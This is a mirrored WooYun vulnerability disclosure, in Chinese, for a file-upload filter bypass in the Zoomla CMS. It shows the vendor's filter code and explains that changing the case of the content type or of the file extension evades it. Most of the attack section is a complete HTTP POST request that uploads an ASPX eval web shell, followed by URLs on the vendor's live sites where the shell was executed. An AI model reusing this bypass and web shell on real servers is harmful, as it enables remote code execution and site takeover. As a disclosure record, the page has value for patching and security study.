乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-10: 细节已通知厂商并且等待厂商处理中 2015-07-15: 厂商已经确认,细节仅向厂商公开 2015-07-18: 细节向第三方安全合作伙伴开放 2015-09-08: 细节向核心白帽子及相关领域专家公开 2015-09-18: 细节向普通白帽子公开 2015-09-28: 细节向实习白帽子公开 2015-10-13: 细节向公众公开
有防御,但是可以绕过
/Plugins/swfFileUpload/UploadHandler.ashx 有一个全局过滤
asp_code.dllclass ZoomlaSecurityCenter
public static void CheckUpladFiles() { HttpRequest request = HttpContext.Current.Request; HttpResponse response = HttpContext.Current.Response; if (HttpContext.Current.Request.ContentType.IndexOf("multipart/form-data") > -1) { HttpFileCollection files = request.Files; for (int i = 0; i < files.Count; i++) { HttpPostedFile httpPostedFile = files[i]; string fileName = httpPostedFile.FileName; if (httpPostedFile.ContentLength > 0) { if (fileName.IndexOf(".") > -1) { string[] array = fileName.Split(new char[] { '.' }); for (int j = 1; j < array.Length; j++) { string ext = array[j].ToString().ToLower(); if (!ZoomlaSecurityCenter.ExNameCheck(ext)) { string findStr = System.IO.Path.GetExtension(fileName).ToLower().Replace(".", ""); string text = SiteConfig.SiteOption.UploadFileExts.ToLower(); if (!StringHelper.FoundCharInArr(text, findStr, "|")) { function.WriteErrMsg("上传的文件不是符合扩展名" + text + "的文件"); response.End(); } } else { function.WriteErrMsg("请勿上传可疑文件!"); response.End(); } } } else { function.WriteErrMsg("请勿上传可疑文件!"); response.End(); } } } } }
将multipart/form-data的大小写改下就可以绕过了局部过滤可以改文件后缀名大小写绕过
POST /Plugins/swfFileUpload/UploadHandler.ashx HTTP/1.1Host: demo.zoomla.cnContent-Length: 263Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: nullUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/43.0.2357.81 Chrome/43.0.2357.81 Safari/537.36Content-Type: Multipart/form-data; boundary=----WebKitFormBoundaryNyS0P5wwqaOrCYshAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ASP.NET_SessionId=gwezhhqzegfs5nhcpdeaso5s; bdshare_firstime=1436497685958; jiathis_rdc=%7B%22http%3A//www.zoomla.cn/down/2407.shtml%22%3A%220%7C1436497760852%22%7D; hasshown=1------WebKitFormBoundaryNyS0P5wwqaOrCYshContent-Disposition: form-data; name="Filedata"; filename="name.Aspx"Content-Type: application/x-aspx<%@ Page Language="Jscript"%><%eval(Request.Item["zsd"],"unsafe");%>------WebKitFormBoundaryNyS0P5wwqaOrCYsh--
http://www.zoomla.cn/uploadfiles/2015/7/10/201507101729516640188.Aspx?zsd=Response.Write(%22wooyun%22);http://demo.zoomla.cn/uploadfiles/2015/7/10/201507101729537310808.Aspx?zsd=Response.Write(%22wooyun%22);
!!
危害等级:低
漏洞Rank:5
确认时间:2015-07-15 09:52
感谢反馈!
暂无